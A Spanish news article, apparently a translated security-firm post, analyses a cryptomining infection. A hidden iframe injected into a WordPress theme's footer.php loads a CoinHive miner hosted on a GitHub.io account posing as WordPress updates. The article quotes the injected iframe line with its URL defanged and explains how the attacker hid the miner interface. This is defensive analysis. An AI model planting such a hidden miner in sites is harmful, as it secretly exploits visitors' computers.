Globedia.com

×
×

Error de autenticación

Ha habido un problema a la hora de conectarse a la red social. Por favor intentalo de nuevo

Si el problema persiste, nos lo puedes decir AQUÍ

×
cross

Suscribete para recibir las noticias más relevantes

×
Recibir alertas

¿Quieres recibir una notificación por email cada vez que Webbingbcn escriba una noticia?

Criptomineros maliciosos de GitHub

26/03/2018 05:10 0 Comentarios Lectura: ( palabras)

Criptomineros compartidos y utilizados maliciosamente en GitHub por hackers para explotar la CPU de los visitantes del sitio web

Recientemente, un webmaster se puso en contacto con nosotros cuando su antivirus AVG informó que se había encontrado la infección JS:Miner-C[Trj] en su sitio.

Nuestra investigación reveló que se había inyectado un iframe oculto en el archivo footer.php del tema:

<iframe src="hxxps://wpupdates.github[.]io/ping/"box-sizing: inherit; font-weight: 700;">0;heigh:0;border:none;"></iframe>

Cuando abrimos la URL en un navegador, la página estaba en blanco.

Después de revisar el código fuente HTML, descubrimos un trozo de JavaScript usando el CoinHive miner con la clave del sitio y el nombre de usuario.

Interfaz de usuario de Cryptominer oculta

Curiosamente, también encontramos algo de código HTML/JS para una interfaz de usuario de minería "oculta". La interfaz de usuario no sería visible porque la página se está cargando dentro de un iframe invisible. Esto plantea la pregunta - ¿quién necesita una interfaz de usuario si no puede verla, y por qué ocultarla si ya está dentro de un iframe invisible?

Una rápida búsqueda en Google reveló un repositorio GitHub de tres meses de antigüedad con una simple aplicación web de una página que permite a cualquiera ingresar la clave y el nombre de usuario de su sitio CoinHive para comenzar a extraer Monero por sí mismo.

La URL wpupdates en el iframe oculto contiene una copia de la misma aplicación web. El atacante hizo algunas modificaciones por supuesto, incluyendo:

Cambiar la clave de centro por defecto

Añadiendo el título "wordpress ping srvice"

Eliminar la visibilidad de la interfaz añadiendo style="opacity:0;" al iframe.

Wpupdates Repositorios GitHub

Este iframe oculto está alojado en GitHub.io, lo que significa que las páginas tienen sus propios repositorios GitHub, y wpupdates es en realidad el nombre de una cuenta GitHub. De hecho, https://github.com/wpupdates contiene dos repositorios: ping (creado el 18 de noviembre) y stack (creado el 27 de noviembre).

Ping, como habrás adivinado, es el repositorio de hxxps://wpupdates.github[....] io/ping/ iframe oculto. El repositorio "stack" es casi idéntico (bajo otro nombre de usuario CoinHive) y su URL en github.io es hxxps://wpupdates.github[....] io/stack/.

GitHub utilizado para el alojamiento de malware

Dado que este malware se encuentra en un repositorio público, podemos ver su historial de revisiones y todos los cambios realizados por su autor.

Así que el primer par de confirmaciones fueron el clásico "hola mundo" en el index.html y una descripción falsa del repositorio (WooCommerce Multilingual - run WooCommerce with WPML) en README.md.

La siguiente confirmación copió una versión ligeramente modificada del código HTML del repositorio coinhive-monero en index.html. Luego se movieron por la falsa descripción multilingüe de WooCommerce y finalmente la eliminaron completamente del archivo.

También cambiaron el nombre de usuario de CoinHive de GIT-WP a MoneroU e hicieron que la interfaz de usuario fuera invisible.

GitHub utilizado para el alojamiento de malware

Hay muchos depósitos públicos para los mineros de cryptocurrency (incluyendo la biblioteca original de CoinHive) que atraen a los malos con buenas habilidades de desarrollo. Saben cómo usar herramientas, como Git y GitHub, y cómo modificar código de terceros para sus propias necesidades.

A diferencia de los típicos hackers que alojan código malicioso en lugares sombreados o comprometidos, estos malos actores eligen servicios que los programadores normales elegirían. En este caso, abusaron del servicio gratuito GitHub.io que permite a los usuarios publicar páginas web directamente desde los repositorios de GitHub.

En el terreno de seguridad de páginas web, esta es una tendencia bastante nueva y nos recuerda cómo los hackers abusan de servicios como Pastebin para alojar código malicioso. GitHub no permite repositorios anónimos, por lo que los usuarios necesitan registrarse para obtener una cuenta y poder publicar su contenido.

Estas cuentas pueden deshabilitarse si las denuncia:

Reporte el botón de abuso que aparece en una cuenta de Github.

Sin embargo, si este enfoque se vuelve popular, veremos más cuentas GitHub desechables y cuentas legítimas secuestradas que se utilizan para alojar malware. Y por cierto, este iframe GitHub.io oculto con un minero CoinHive no es el único caso en el que vemos hackers usando GitHub en sus ataques.


Sobre esta noticia

Autor:
Webbingbcn (5 noticias)
Visitas:
3995
Tipo:
Nota de prensa
Licencia:
Distribución gratuita
¿Problemas con esta noticia?
×
Denunciar esta noticia por

Denunciar

Comentarios

Aún no hay comentarios en esta noticia.